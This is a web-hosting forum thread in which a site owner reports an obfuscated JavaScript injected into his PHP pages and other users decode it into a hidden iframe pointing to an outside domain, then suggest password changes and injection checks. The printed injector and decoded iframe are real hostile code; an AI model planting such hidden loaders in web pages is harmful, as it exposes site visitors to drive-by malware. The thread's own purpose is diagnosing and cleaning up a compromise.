FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!


URGENT!!! Scripts modified after hosted on frih account!!!





pollux1er
I don't know what is going on with my web site, but i want to understand! I had first hosted this site that is on my frih account. http://pariafric.frih.net But I am encountering many problem with it. The sripts are in PHP5 with oriented object. I don't think the language is about something in it. But i just want to understand why each time, there are some lines that are inserted into my index.php pages of all my folder. Sripts that i have not written at all!!!

Can somebody explain me that?
rvec
then your scripts have a bug in them which is being exploited, or a user has access to your account.
pollux1er
rvec wrote:
then your scripts have a bug in them which is being exploited, or a user has access to your account.


Which user? that can write suche things

<script language="JavaScript">function ualfdkh){return String.fromCharCode(fdkh);}var pfmv="060105102114097109101032115114099061039104116116112058047047107108101112097046099110047111108097046104116109108039032119105100116104061039050054048039032104101105103104116061039049049048039032115116121108101061039100105115112108097121058032110111110101059039062060047105102114097109101062";var gjxy="";for(zatk=0;zatk<pfmv.length;zatk+=3){gjxy+=ualpfmv.substr (zatk, 3));}document.write(gjxy);</script>
Agent ME
First, try changing your password. Someone could have figured out your account password.

A script you have host might have had a hole in it that let someone hack it. Have you installed any scripts from other sources, or used scripts that deal with files?

(Edited a bit to be readable and not stretch page, but still accurate to original)
pollux1er wrote:
<script language="JavaScript">function ualfdkh)
{return String.fromCharCode(fdkh);}
var pfmv="06010510211409710910103211511409906103910411611611\
20580470471071081011120970460991100471111080970461041161\
09108039032119105100116104061039050054048039032104101105\
10310411606103904904904803903211511612110810106103910010\
51151121080971210580321101111101010590390620600471051021\
14097109101062";
var gjxy="";
for(zatk=0;zatk<pfmv.length;zatk+=3)
{gjxy+=ualpfmv.substr (zatk, 3));}
document.write(gjxy);</script>

That was added to one of your pages? That looks like it would... print some sort of text to the page obfuscated in the numbers.

Checking...
First off, that script has a misspelling - change all occurrences of "ual" to "ua(" to get it to work. (Not that I'd think you'd want to in your real pages, but just to test the script.)
After doing that, the script will attempt to add the following html to the page:
Quote:
<iframe src="http://klepa.cn/ola.html" style="display: none;" height="110" width="260"></iframe>

Which doesn't make sense, as
  • The page linked to gives just a 502 error, making it worthless.
  • The display-style is set to none, so it doesn't even show up on the page, even though the author bothered to set the height and width of the iframe. (Maybe some browsers need those set for compatibility? Still stupid.)

My only thought is that the website linked to could be secretly tracking your website usage, but that's kinda odd for some hacker to do if he's gotten into your pages. Or maybe the page linked to used to be different, and automatically prompted the user to download malware.
pollux1er
Thanks to help me solving this problem. I have already change my password. I am waiting to see if it is going to happen again.
Fire Boar
If it does, you've got a bug in your code somewhere that allows people browsing your page to upload files or modify your page in some way. In this case:

- Cast a critical eye over any javascript your page uses intentionally. If you're not sure about whether a certain system is causing vulnerabilities or not, Google is your friend.
- If you've got things that allow users to add content to your page, such as forums or chat boxes, look out for possible SQL or javascript injections.
pollux1er
Thanks for this advice. I will.
Stubru Freak
Fire Boar wrote:
If it does, you've got a bug in your code somewhere that allows people browsing your page to upload files or modify your page in some way. In this case:

- Cast a critical eye over any javascript your page uses intentionally. If you're not sure about whether a certain system is causing vulnerabilities or not, Google is your friend.
- If you've got things that allow users to add content to your page, such as forums or chat boxes, look out for possible SQL or javascript injections.


Javascript can't do something like that. The second one could be the problem though.
pollux1er
The notice I can may since I have changed my password is that nothing new happen again.
DjMilez
What Agent ME said... but...

http://klepa.cn/

Correct me if I'm wrong but doesn't that look like a frihost placeholder page?
pollux1er
DjMilez wrote:
What Agent ME said... but...

http://klepa.cn/

Correct me if I'm wrong but doesn't that look like a frihost placeholder page?


I don't really understand your question...
Diablosblizz
Quote:
Correct me if I'm wrong but doesn't that look like a frihost placeholder page?


That is the main index.html page for when you create a hosting account with Directadmin, not Frihost.
pollux1er
One thing i know from now is that i have been hacked. Dont ask me why!
rvec
and that post was worth bumping a 3 month old topic?
-closed-
Related topics
This topic is locked: you cannot edit posts or make replies.    Frihost Forum Index -> Scripting -> Php and MySQL

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.